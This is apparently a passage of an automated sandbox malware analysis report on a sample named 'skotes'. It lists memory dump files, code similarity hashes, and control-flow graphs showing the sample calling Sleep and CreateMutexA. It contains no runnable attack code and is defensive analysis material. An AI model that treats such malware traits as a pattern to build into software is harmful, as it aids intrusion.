                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5e73b1b6ce078c3042821523f24fc12ccb8f15e5c609ec8fb25f830803b7638f
                                                                                                                                                                                                                                                                                          • Instruction ID: 8093fecfe3ff3e4ccb5aacd5a6b603ac77f6c31726eb862e3c88259ad352210a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e73b1b6ce078c3042821523f24fc12ccb8f15e5c609ec8fb25f830803b7638f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08314C71B042059BEB189B7ADD89BEDBB62EBC1320F20821DE418972D5C7798981EB51

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 22 fb9f44-fb9f64 26 fb9f92-fb9fae 22->26 27 fb9f66-fb9f72 22->27 30 fb9fdc-fb9ffb 26->30 31 fb9fb0-fb9fbc 26->31 28 fb9f88-fb9f8f call fcd663 27->28 29 fb9f74-fb9f82 27->29 28->26 29->28 32 fba92b 29->32 36 fba029-fba916 call fc80c0 30->36 37 fb9ffd-fba009 30->37 34 fb9fbe-fb9fcc 31->34 35 fb9fd2-fb9fd9 call fcd663 31->35 39 fba953-fba994 Sleep CreateMutexA 32->39 40 fba92b call fe6c6a 32->40 34->32 34->35 35->30 43 fba00b-fba019 37->43 44 fba01f-fba026 call fcd663 37->44 51 fba9a7-fba9a8 39->51 52 fba996-fba998 39->52 40->39 43->32 43->44 44->36 52->51 54 fba99a-fba9a5 52->54 54->51
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4c7ee3ac07e589c5ebbdd30a9d82f1c28f9b32a3345884577eb12d889d9457d1
                                                                                                                                                                                                                                                                                          • Instruction ID: 75e59bcfc37278516a8dde9dc217ead953ae131af523562481ab9cc368fa54c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c7ee3ac07e589c5ebbdd30a9d82f1c28f9b32a3345884577eb12d889d9457d1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9317F317042049BEB18AB7ADC897ECB762EF85320F20421DE418DB2C5C77A8980EB51

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 56 fba079-fba099 60 fba09b-fba0a7 56->60 61 fba0c7-fba0e3 56->61 62 fba0a9-fba0b7 60->62 63 fba0bd-fba0c4 call fcd663 60->63 64 fba111-fba130 61->64 65 fba0e5-fba0f1 61->65 62->63 70 fba930-fba994 call fe6c6a Sleep CreateMutexA 62->70 63->61 68 fba15e-fba916 call fc80c0 64->68 69 fba132-fba13e 64->69 66 fba0f3-fba101 65->66 67 fba107-fba10e call fcd663 65->67 66->67 66->70 67->64 74 fba140-fba14e 69->74 75 fba154-fba15b call fcd663 69->75 86 fba9a7-fba9a8 70->86 87 fba996-fba998 70->87 74->70 74->75 75->68 87->86 88 fba99a-fba9a5 87->88 88->86
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 499b9f1a192922c38a3b3c7d7f725743f9c45aeb5e2ba868b5a3580988560cb2
                                                                                                                                                                                                                                                                                          • Instruction ID: fed82dfe3da35714d5b609545dfe0cac54e2afdd5206d02b1c588c658a61a51b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499b9f1a192922c38a3b3c7d7f725743f9c45aeb5e2ba868b5a3580988560cb2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B312871B101449BEB18EB7DCD89BDDB762EB81320F20421DE4189B2D5D73A9980EF16

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 90 fba1ae-fba1ce 94 fba1fc-fba218 90->94 95 fba1d0-fba1dc 90->95 98 fba21a-fba226 94->98 99 fba246-fba265 94->99 96 fba1de-fba1ec 95->96 97 fba1f2-fba1f9 call fcd663 95->97 96->97 100 fba935 96->100 97->94 102 fba228-fba236 98->102 103 fba23c-fba243 call fcd663 98->103 104 fba293-fba916 call fc80c0 99->104 105 fba267-fba273 99->105 107 fba953-fba994 Sleep CreateMutexA 100->107 108 fba935 call fe6c6a 100->108 102->100 102->103 103->99 111 fba289-fba290 call fcd663 105->111 112 fba275-fba283 105->112 119 fba9a7-fba9a8 107->119 120 fba996-fba998 107->120 108->107 111->104 112->100 112->111 120->119 122 fba99a-fba9a5 120->122 122->119
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
